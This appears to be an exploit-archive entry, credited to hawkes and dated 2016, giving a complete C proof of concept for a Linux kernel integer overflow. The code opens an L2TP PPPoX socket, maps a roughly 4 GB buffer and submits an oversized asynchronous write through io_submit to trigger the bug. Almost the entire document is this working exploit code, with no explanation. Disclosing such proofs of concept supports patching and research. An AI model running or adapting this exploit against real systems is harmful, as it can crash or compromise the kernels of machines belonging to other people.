Linux io_submit L2TP Sendmsg Integer Overflow
| EKU-ID: 5416 | CVE: | OSVDB-ID: |
| Author: hawkes | Published: 2016-02-25 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 5416 | CVE: | OSVDB-ID: |
| Author: hawkes | Published: 2016-02-25 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
#include <stdio.h>
#include <string.h>
#include <errno.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <linux/if.h>
#include <linux/if_pppox.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <linux/aio_abi.h>
int main(int argc, char *argv[]) {
struct sockaddr_pppol2tp sax;
struct sockaddr_in addr;
int s, sfd, ret;
struct iocb *iocbp;
struct iocb iocb;
aio_context_t ctx_id = 0;
void *data;
s = socket(AF_PPPOX, SOCK_DGRAM, PX_PROTO_OL2TP);
if (s == -1) {
perror("socket");
return -1;
}
memset(&sax, 0, sizeof(struct sockaddr_pppol2tp));
sax.sa_family = AF_PPPOX;
sax.sa_protocol = PX_PROTO_OL2TP;
sax.pppol2tp.fd = -1;
sax.pppol2tp.addr.sin_addr.s_addr = addr.sin_addr.s_addr;
sax.pppol2tp.addr.sin_port = addr.sin_port;
sax.pppol2tp.addr.sin_family = AF_INET;
sax.pppol2tp.s_tunnel = -1;
sax.pppol2tp.s_session = 0;
sax.pppol2tp.d_tunnel = -1;
sax.pppol2tp.d_session = 0;
sfd = connect(s, (struct sockaddr *)&sax, sizeof(sax));
if (sfd == -1) {
perror("connect");
return -1;
}
data = mmap(NULL, 0x100001000, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
if (data == MAP_FAILED) {
perror("mmap");
return -1;
}
memset(data, 0x41, 0x100001000);
ret = syscall(__NR_io_setup, 2, &ctx_id);
if (ret == -1) {
perror("io_setup");
return -1;
}
memset(&iocb, 0, sizeof(struct iocb));
iocb.aio_fildes = s;
iocb.aio_lio_opcode = IOCB_CMD_PWRITE;
iocb.aio_nbytes = 0xfffffe60;
iocb.aio_buf = (unsigned long) &data;
iocbp = &iocb;
syscall(__NR_io_submit, ctx_id, 1, &iocbp);
return 0;
}